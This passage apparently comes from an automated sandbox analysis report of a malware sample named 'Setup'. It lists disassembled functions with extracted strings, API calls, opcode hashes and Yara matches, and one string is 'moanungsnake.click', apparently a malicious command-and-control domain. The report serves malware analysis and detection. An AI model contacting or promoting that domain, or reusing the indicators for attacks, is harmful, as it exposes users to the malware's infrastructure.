q#v%, xrefs: 00FAC0E8
,* ^, xrefs: 00FABE58
./, xrefs: 00FAC109

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: ,* ^$./$q#v%
API String ID: 0-217856844
Opcode ID: f4053ae6f0274425c345b77ed2eb28845960c609169c0a65cc9f127278c0bef2
Instruction ID: 1f4cbf727c4e330f2c16742bfad45942770e645d8ab07d23ed48165faba1810e
Opcode Fuzzy Hash: f4053ae6f0274425c345b77ed2eb28845960c609169c0a65cc9f127278c0bef2
Instruction Fuzzy Hash: C561D5B160C3C18ED7298F25C8607ABBBE1AFD3314F18896DD0C99B242DB79550ACB57

Function 00F8FACC Relevance: 3.9, Strings: 3, Instructions: 176COMMON

Download Yara Rule

Strings

X, xrefs: 00F8FCA7
%V, xrefs: 00F8FC9C
rg, xrefs: 00F8FB6F

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: %V$X$rg
API String ID: 0-21410605
Opcode ID: ae0f74153454d7edb9c9372fad9df93a4fa69148bc21e89702c74d578471a61b
Instruction ID: 5ebbb4544c9e0d178d1ce4f3f621bcae89350076fe1c6185854ceb862e5440ba
Opcode Fuzzy Hash: ae0f74153454d7edb9c9372fad9df93a4fa69148bc21e89702c74d578471a61b
Instruction Fuzzy Hash: 27514A717183414BD7289B389C527EFBBD2EBDA314F185A3CD0C5C7292E73844169756

Function 031F24E0 Relevance: 3.8, Strings: 3, Instructions: 97COMMON

Download Yara Rule

Strings

E%R', xrefs: 031F2511
,-, xrefs: 031F2525
P!f#, xrefs: 031F2509

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: ,-$E%R'$P!f#
API String ID: 0-2971910628
Opcode ID: 61a512a8dd5b0093d877021793ae340e38dc2ad717f20e3978008f436346fc08
Instruction ID: c84602eb492719f03cc1ff75e8fc76d8e7a4b3b3bd3237217f5412fd494903d5
Opcode Fuzzy Hash: 61a512a8dd5b0093d877021793ae340e38dc2ad717f20e3978008f436346fc08
Instruction Fuzzy Hash: 90213636A5A3108BD3188F64D89176FF7A1EBD6740F09892CE5D16B2C0CE7488068B86

Function 00FA3D0C Relevance: 3.8, Strings: 3, Instructions: 97COMMON

Download Yara Rule

Strings

E%R', xrefs: 00FA3D3D
,-, xrefs: 00FA3D51
P!f#, xrefs: 00FA3D35

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: ,-$E%R'$P!f#
API String ID: 0-2971910628
Opcode ID: 3998b422e28efc6f59f676d41589f2dbc82b58c297091faa10c25e5f5c4e71fe
Instruction ID: 3f757d895f28ed6f126a5177f3a6e28e2c7f9706e838b156430fff636b5fe6e7
Opcode Fuzzy Hash: 3998b422e28efc6f59f676d41589f2dbc82b58c297091faa10c25e5f5c4e71fe
Instruction Fuzzy Hash: 06214872B5A3208BD3288F64D88175FF7A1EBD2740F0A852CE5D12B3C1CE758905CB86

Function 031FC8BE Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 031FCBFF

Strings

(|DS, xrefs: 031FCB02

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: FreeLibrary
String ID: (|DS
API String ID: 3664257935-2136884150
Opcode ID: f0fa7ddbcd172450a04dc2ca2fc729182cc123972efe6697ab7f65b00c2682eb
Instruction ID: eb653e20e0f413d49c75bc283cb3367a2325fcafdad68a4fd3b9b2d84c0c77cc
Opcode Fuzzy Hash: f0fa7ddbcd172450a04dc2ca2fc729182cc123972efe6697ab7f65b00c2682eb
Instruction Fuzzy Hash: 59918A366483859FE324CE28C8417ABFBD1AF89300F198A6DE9D58B381D735A805D7D2

Function 031FE17E Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 208memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 031FE2A0

Strings

0, xrefs: 031FE55D

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: AllocString
String ID: 0
API String ID: 2525500382-4108050209
Opcode ID: 4b4a48add3d403af58a1809e0eae096ca8eb8fc420c56ebb55ea44c10789a358
Instruction ID: bc9e1a232ad68e72c445bf9db7fa43f132fbacce5ba2c09b2d6321c1c110c99f
Opcode Fuzzy Hash: 4b4a48add3d403af58a1809e0eae096ca8eb8fc420c56ebb55ea44c10789a358
Instruction Fuzzy Hash: CEB11D21109FC28ED336C77C8858B97BFD16B66314F088AADD0FB8B2D2D7A56145C722

Function 00F935BC Relevance: 3.5, Strings: 1, Instructions: 2207COMMON

Download Yara Rule

Strings

`, xrefs: 00F942E7

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 92427de329aa27fec2346b84e92dc27dabd9835d30e2a1c32efb02c845ce806f
Instruction ID: c5f96f6a5244ec5ed190fa52e60b68983bbfd574ecd98eb3db58a2f041d0292a
Opcode Fuzzy Hash: 92427de329aa27fec2346b84e92dc27dabd9835d30e2a1c32efb02c845ce806f
Instruction Fuzzy Hash: C0130471908B808FE725DF3CC845756BFE1AB56320F098A6CD4EA8B392D739E409D752

Function 031EC720 Relevance: 2.9, Strings: 2, Instructions: 438COMMON

Download Yara Rule

Strings

GI, xrefs: 031EC7D4
MB, xrefs: 031EC7DC

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: GI$MB
API String ID: 0-2138107554
Opcode ID: 03d99aa46cea2c47784dc79504c79fbc17cddc45dcebe2ea0729f4c22c79df73
Instruction ID: b59d096ffde01ab3d74548c434b86eb319c3725cddaf1071fb995fc4ee064ac4
Opcode Fuzzy Hash: 03d99aa46cea2c47784dc79504c79fbc17cddc45dcebe2ea0729f4c22c79df73
Instruction Fuzzy Hash: 62C1FDB6A187018BC724CF28CC5166BB7F6EF89310F18996CE8D5CB284E739D905C796

Function 00F9DF4C Relevance: 2.9, Strings: 2, Instructions: 438COMMON

Download Yara Rule

Strings

GI, xrefs: 00F9E000
MB, xrefs: 00F9E008

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: GI$MB
API String ID: 0-2138107554
Opcode ID: d5d2de001ea73f5eaa28f8334bc2ed67157d91ed7fd445c8295a9bf8cd2bb2c0
Instruction ID: 042c171c56abe00fa076bfb8cf26e7b777967e1868cf5c52480ae3a94443f890
Opcode Fuzzy Hash: d5d2de001ea73f5eaa28f8334bc2ed67157d91ed7fd445c8295a9bf8cd2bb2c0
Instruction Fuzzy Hash: C3C1EFB5A183018BDB24CF28CC4176BB7E2EF95320F18992DE8C5CB294E778D905C756

Function 00FBEC5C Relevance: 2.9, Strings: 2, Instructions: 393COMMON

Download Yara Rule

Strings

*+,-, xrefs: 00FBED03
:, xrefs: 00FBEE39

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: :$*+,-
API String ID: 0-2599365846
Opcode ID: 9885ea1ba4128772390056912e75172e5baeb9ab311f0870121567cd6e429eff
Instruction ID: 7cbb7b3510a69c9c2f4e6ca55fcc973daeb1ca101bdc51319f2e256436346b00
Opcode Fuzzy Hash: 9885ea1ba4128772390056912e75172e5baeb9ab311f0870121567cd6e429eff
Instruction Fuzzy Hash: D4B12631A083414BC725CF29D8919FABBE2EBDA320F1D853CE9D587352DA34D845EB91

Function 031DA900 Relevance: 2.9, Strings: 2, Instructions: 391COMMON

Download Yara Rule

Strings

f, xrefs: 031DAB41
@A, xrefs: 031DAAC4

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: @A$f
API String ID: 0-2654029085
Opcode ID: 2590ec758c7adb13381a6700b604e957215d6d57b45f99b6866aec5007a4d92b
Instruction ID: 007fcbffded8a7cfa4fb94b650aabdb3e52c0b067f20f72ddfd09c1e8d60924b
Opcode Fuzzy Hash: 2590ec758c7adb13381a6700b604e957215d6d57b45f99b6866aec5007a4d92b
Instruction Fuzzy Hash: 5DC1287165C7918FD328CF28989026BFFE2AFCA614F1C856CE8D54B345C735890ACB92

Function 00F8C12C Relevance: 2.9, Strings: 2, Instructions: 391COMMON

Download Yara Rule

Strings

@A, xrefs: 00F8C2F0
f, xrefs: 00F8C36D

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: @A$f
API String ID: 0-2654029085
Opcode ID: 104eedcd24bc785e75eb60431ac918d73c7f0ae9fa83ad125c0f10ce2dfc392d
Instruction ID: 846c67ff63a3830535f833d5adb86a1a40ce73945ebfbbbbe3ec929af3a2ce6a
Opcode Fuzzy Hash: 104eedcd24bc785e75eb60431ac918d73c7f0ae9fa83ad125c0f10ce2dfc392d
Instruction Fuzzy Hash: 2BC14872A4C3914FD714DF2894912ABBBD2ABC2314F2C852CE8D55F341CA75DD0A9BE2

Function 031D4290 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

IEND, xrefs: 031D4681
), xrefs: 031D430B

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 686d5b3f9f1962a1ef1e80b04a125ed7350c4bc83f5acfb16731cd837a3feda0
Instruction ID: 5ee609adcf072ab3f6edbd6c6517d58f448f756ddfaf223bb8e94f7c2cabaacb
Opcode Fuzzy Hash: 686d5b3f9f1962a1ef1e80b04a125ed7350c4bc83f5acfb16731cd837a3feda0
Instruction Fuzzy Hash: 86D1D1B5908344AFD720CF19D88475FBBE4EB8A304F04492DF9999B381DB75E948CB82

Function 00F85ABC Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

), xrefs: 00F85B37
IEND, xrefs: 00F85EAD

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 88c1310fc57cde859b54b7436b6939af60a3b0e24e94e47f2ac36342eba416c0
Instruction ID: 26295024258bb0525db71624437b6d46051122dbd63484ad9968b11c23a18748
Opcode Fuzzy Hash: 88c1310fc57cde859b54b7436b6939af60a3b0e24e94e47f2ac36342eba416c0
Instruction Fuzzy Hash: 97D1DFB1A083449FDB20EF14CC4179FBBE4AB94704F18492DF9999B381D379E908DB92

Function 031FA67D Relevance: 2.7, Strings: 2, Instructions: 202COMMON

Download Yara Rule

Strings

./, xrefs: 031FA8DD
q#v%, xrefs: 031FA8BC

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: ./$q#v%
API String ID: 0-465344239
Opcode ID: dcf82e57c8b20a7fc1f2bf35c408f6b3eaece8e581849a5ae7011af5614b9038
Instruction ID: 343797d191d5efc3969b717df86b27b82416dc468b83174bb67e206b74fce3a5
Opcode Fuzzy Hash: dcf82e57c8b20a7fc1f2bf35c408f6b3eaece8e581849a5ae7011af5614b9038
Instruction Fuzzy Hash: 5C61B27060C3C18FD729CB259490BABBBE1AF97305F1889ACC1C95B282DB79550ACB57

Function 00FABEA9 Relevance: 2.7, Strings: 2, Instructions: 202COMMON

Download Yara Rule

Strings

q#v%, xrefs: 00FAC0E8
./, xrefs: 00FAC109

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: ./$q#v%
API String ID: 0-465344239
Opcode ID: 34ced2be2609be838e2c30d6ca8f700869936f59ce5c9848520b6c743d936b75
Instruction ID: 590710aa694efbe2b8a97ad2175e4d166fa1ac4b475b133cc4844bb1dd92a450
Opcode Fuzzy Hash: 34ced2be2609be838e2c30d6ca8f700869936f59ce5c9848520b6c743d936b75
Instruction Fuzzy Hash: D161B4B460D3C18ED7298F25C8A07BBBBD1AF93314F18896CD0C99B243D779450A9B57

Function 031F6A49 Relevance: 2.6, Strings: 2, Instructions: 69COMMON

Download Yara Rule

Strings

>, xrefs: 031F6AE1
34, xrefs: 031F6AC5

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: 34$>
API String ID: 0-3492886802
Opcode ID: af47398d8f2cc0a386ee4841b56ee19a4eede84a5fa15e9f4feac192a48f43ad
Instruction ID: ccc909fbc703c5e0afc6444faab9561ad88e88830cd7e6a7905276968bf37068
Opcode Fuzzy Hash: af47398d8f2cc0a386ee4841b56ee19a4eede84a5fa15e9f4feac192a48f43ad
Instruction Fuzzy Hash: 7121A7705183908FC364CF14C5A275FFBA1FB85304F10992CEA911B285C7B1E946CF8A

Function 00FA8275 Relevance: 2.6, Strings: 2, Instructions: 69COMMON

Download Yara Rule

Strings

34, xrefs: 00FA82F1
>, xrefs: 00FA830D

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 34$>
API String ID: 0-3492886802
Opcode ID: 81207bb2254fe1230fd99d9248ce8786400669430a1ceb321d93401048f9321b
Instruction ID: 7d8fbc2bdda558291951fc027228f0e4a6cfee87f0e6c4979f317e609969dfcc
Opcode Fuzzy Hash: 81207bb2254fe1230fd99d9248ce8786400669430a1ceb321d93401048f9321b
Instruction Fuzzy Hash: 692187705083908FC364CF1484A175FFBA1FBC6714F50992CEA955B291C7B1E94ADF8A

Function 031E62A7 Relevance: 1.8, Strings: 1, Instructions: 580COMMON

Download Yara Rule

Strings

EKy, xrefs: 031E62CC

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: EKy
API String ID: 0-1733955851
Opcode ID: 6db0755f3543be05f4bb12d87c8d361f577eafe5b44872723de92982184a0d5c
Instruction ID: f57548cdf1745e7955e167e0cab6e9337f60e89a439b1fc9476a398288e787eb
Opcode Fuzzy Hash: 6db0755f3543be05f4bb12d87c8d361f577eafe5b44872723de92982184a0d5c
Instruction Fuzzy Hash: DB1288B15083918FD734CF21C8A17ABBBE2FF95314F198A9CD4C94B251E7B98845CB92

Function 00F97AD3 Relevance: 1.8, Strings: 1, Instructions: 580COMMON

Download Yara Rule

Strings

EKy, xrefs: 00F97AF8

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: EKy
API String ID: 0-1733955851
Opcode ID: bdd7259fd51de2c0ba07665218e33a45057adef308d530bc4a102ae7ddb8186b
Instruction ID: 1b0440bee53c8451458cb139fb1ac74618e9cb9c5a0c5b34626f57d3ad0674f8
Opcode Fuzzy Hash: bdd7259fd51de2c0ba07665218e33a45057adef308d530bc4a102ae7ddb8186b
Instruction Fuzzy Hash: C512A9B19183918BE734CF21C8A17ABBBE1FF81324F19895CD4C98F251E7798845CB96

Function 031F1170 Relevance: 1.7, Strings: 1, Instructions: 446COMMON

Download Yara Rule

Strings

LKJI, xrefs: 031F1595

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: LKJI
API String ID: 0-2313094147
Opcode ID: 68b55d7d70360bc52877acf0ec810f9ca281fc8cc08f6d8347c3b09bf879d538
Instruction ID: 07118408f975f28c22feb27230090395c8cec09daa0947833a880988ccbf874f
Opcode Fuzzy Hash: 68b55d7d70360bc52877acf0ec810f9ca281fc8cc08f6d8347c3b09bf879d538
Instruction Fuzzy Hash: F9C1F676604300AFD714DF24C89266BB3E6EFC9264F1D893CE9859B382E379D909C752

Function 00FA299C Relevance: 1.7, Strings: 1, Instructions: 446COMMON

Download Yara Rule

Strings

LKJI, xrefs: 00FA2DC1

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: LKJI
API String ID: 0-2313094147
Opcode ID: ba052d916a9c505e099a5f3ad4853420a6ab1e72213684f02ac308f09b3e468c
Instruction ID: e8c5609f5f94df79e253dfbc8d4fc84c81412cb06ac8d46c7d1ecf39d32b4280
Opcode Fuzzy Hash: ba052d916a9c505e099a5f3ad4853420a6ab1e72213684f02ac308f09b3e468c
Instruction Fuzzy Hash: 78C1D6B2B083005BD7649F28CC9266BB3F1EFD2334F19852CE89597282E778D905E756

Function 031F8EC0 Relevance: 1.7, Strings: 1, Instructions: 416COMMON

Download Yara Rule

Strings

", xrefs: 031F91C6

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 838f1a844c204a40b442758e2825e65f5a318cc66b0189c33eb0a5e391c37fe0
Instruction ID: b7b99c7c61b32190b663798436011dea0c8d464a98c24488b34a4525e74096de
Opcode Fuzzy Hash: 838f1a844c204a40b442758e2825e65f5a318cc66b0189c33eb0a5e391c37fe0
Instruction Fuzzy Hash: 10D107B6A083105FDB14DE24C480B6BB7E9AB8D210F1D896DE699CB381E734D844C7D2

Function 00FAA6EC Relevance: 1.7, Strings: 1, Instructions: 416COMMON

Download Yara Rule

Strings

", xrefs: 00FAA9F2

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: f50bd206dc5cf846b31053db10e97303c2ed342685f18f7ec429e9008663e72a
Instruction ID: 827a6dc9bf5b732dfa49bb5eb3725bc15757900f555b62de0155bd41eab34fea
Opcode Fuzzy Hash: f50bd206dc5cf846b31053db10e97303c2ed342685f18f7ec429e9008663e72a
Instruction Fuzzy Hash: B7D1F6F2A083119FD716CE24C85176BB7E59B86360F19852DE89987381E738DC4CE793

Function 00FABCC3 Relevance: 1.6, Strings: 1, Instructions: 349COMMON

Download Yara Rule

Strings

WZ8j, xrefs: 00FAD6A3

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: WZ8j
API String ID: 0-2890758108
Opcode ID: ef68a4d59109581ba3b79763ff2228e0c1ee8dd74398775abf3003e39e484d74
Instruction ID: 0ff33ef6a2fb06e8de18f4b1dd7b8d6b15b8e4b72a80491fd6d41e1155680723
Opcode Fuzzy Hash: ef68a4d59109581ba3b79763ff2228e0c1ee8dd74398775abf3003e39e484d74
Instruction Fuzzy Hash: 88A11671A0C3908FD739CF2984507ABBBE1AFD7304F18896DD4CA9B252DB394809DB56

Function 00FA6AAC Relevance: 1.6, Strings: 1, Instructions: 325COMMON

Download Yara Rule

Strings

LKJI, xrefs: 00FA6AD1

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: LKJI
API String ID: 0-2313094147
Opcode ID: 54ee321b52b6c9f64f95d3d7e0e5401e4f1ca5be5d9ed69c2539be69c1e49a2a
Instruction ID: 499edb1b0908ccbc71a7a040c0b6823ed9a24875aa74bf4cdc82756319b3a462
Opcode Fuzzy Hash: 54ee321b52b6c9f64f95d3d7e0e5401e4f1ca5be5d9ed69c2539be69c1e49a2a
Instruction Fuzzy Hash: C59167F2F143104BD714DF25CC9276BB3A2EBD2324F1D853CE985CB281E6799809A7A5

Function 031F0E10 Relevance: 1.6, Strings: 1, Instructions: 316COMMON

Download Yara Rule

Strings

_q, xrefs: 031F1076

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: _q
API String ID: 0-1542984398
Opcode ID: 192cf57433a0d50e9ba049138907a00e47621c871b51383e1e426e2ff52f8c33
Instruction ID: ac698c07a95009821b035c840305953bda8870d5658903e775aa9875e2e1c655
Opcode Fuzzy Hash: 192cf57433a0d50e9ba049138907a00e47621c871b51383e1e426e2ff52f8c33
Instruction Fuzzy Hash: 949116B16083019FD714DF21CC91B6BB7B5EF89358F08892CEA858B392E375E949C752

Function 00FA263C Relevance: 1.6, Strings: 1, Instructions: 316COMMON

Download Yara Rule

Strings

_q, xrefs: 00FA28A2

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: _q
API String ID: 0-1542984398
Opcode ID: a2901a25de1f7ec9734bfaf8bfc48503d23804488e3d2a6a06371f6810ab9183
Instruction ID: 5440915a1bea845104248b0b54bfb5a3c6efb8fe1336ff1b9741064e0999f0e7
Opcode Fuzzy Hash: a2901a25de1f7ec9734bfaf8bfc48503d23804488e3d2a6a06371f6810ab9183
Instruction Fuzzy Hash: 239105B1A083019BDB54DF28CC81B6BB7B4FF86724F14891CF9858B281E378E909D756

Function 031DC7E8 Relevance: 1.5, Strings: 1, Instructions: 279COMMON

Download Yara Rule

Strings

moanungsnake.click, xrefs: 031DCC2E

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: moanungsnake.click
API String ID: 0-3470817518
Opcode ID: e8abf9d1b803f9fdf128c1efa6be635192eb4c54d5b709c0a3f57f91b474fae5
Instruction ID: f21d4c92d66b0ee14072c70bb19da4c7dce1b52bbe7c33f9054fb6f31a3d9479
Opcode Fuzzy Hash: e8abf9d1b803f9fdf128c1efa6be635192eb4c54d5b709c0a3f57f91b474fae5
Instruction Fuzzy Hash: 5D91BCB154D3D08FE336CF2998907EBBBE1ABDA300F194A5DC4C95B641D7354906CB92

Function 031FF1A0 Relevance: 1.5, Strings: 1, Instructions: 274COMMON

Download Yara Rule

Strings

?, xrefs: 031FF2DF

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: ?
API String ID: 0-1684325040
Opcode ID: 12d1f6fe90acf7e665c9628f15fcd916bbac17283e68f18ebfe8f1408bef73eb
Instruction ID: 2d7f2ed4209f1bf1a6779a516a98adb97733642d3cb761e2a919e597ff8da559
Opcode Fuzzy Hash: 12d1f6fe90acf7e665c9628f15fcd916bbac17283e68f18ebfe8f1408bef73eb
Instruction Fuzzy Hash: 7D812B3764DA914FD32C997C5C6136ABA934BCA234F1EC36DDAF58B3D5D6A888068340

Function 00FB09CC Relevance: 1.5, Strings: 1, Instructions: 274COMMON

Download Yara Rule

Strings

?, xrefs: 00FB0B0B

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: ?
API String ID: 0-1684325040
Opcode ID: 15183838959eb291b7c5edd77f7e457c5fe9f8d61b71e6aaa587a83496aea088
Instruction ID: 09568749e9d9f422f6f567eb4313d688ada86da4faefc240ea84d5a769e61f40
Opcode Fuzzy Hash: 15183838959eb291b7c5edd77f7e457c5fe9f8d61b71e6aaa587a83496aea088
Instruction Fuzzy Hash: 31811737B49B914BD328597D8C623A7BA834BD6230F2DC77DA9F58B3D1D9688C05A340

Function 031ECFB0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

~, xrefs: 031ED082

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 94610b6b2f86c27e9dd728b9ebb7e08e3b87ac7e37857c4a74a24dc715795baa
Instruction ID: 48c7aa62100ec4da1681b02a57fb81f1d612ff36170ef58913fa6df5e0d9ea0b
Opcode Fuzzy Hash: 94610b6b2f86c27e9dd728b9ebb7e08e3b87ac7e37857c4a74a24dc715795baa
Instruction Fuzzy Hash: C6815B36A046614FCB25CE28D85035ABBD19B89224F1D827DECF99B3D2CB35D846C7D1

Function 00F9E7DC Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

~, xrefs: 00F9E8AE

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 75c03745a0e1d1b17f75f679047c279004c28958644a3b99cb6a46e23b4415ed
Instruction ID: 6a599cef06cbd57a00b833e774d37cc6dda0df8a073f75a4cce68b8f28b0e630
Opcode Fuzzy Hash: 75c03745a0e1d1b17f75f679047c279004c28958644a3b99cb6a46e23b4415ed
Instruction Fuzzy Hash: 86812972A042614FDF15CE288C513AABBD1AB85320F19827DECF99B3D2D6359C06E7D1

Function 03208D60 Relevance: 1.5, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

